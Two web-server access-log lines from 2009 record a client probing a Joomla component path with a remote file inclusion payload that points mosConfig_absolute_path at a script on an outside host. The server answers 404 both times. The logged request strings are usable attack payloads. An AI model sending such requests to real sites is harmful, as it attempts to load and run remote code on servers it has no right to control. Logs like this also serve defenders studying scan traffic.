74.53.70.114 - - [22/Jun/2009:03:00:50 -0400] "GET ///////administrator////components//////com_serverstat////////install.serverstat.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:03:00:50 -0400] "GET /logs///////administrator////components//////com_serverstat////////install.serverstat.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
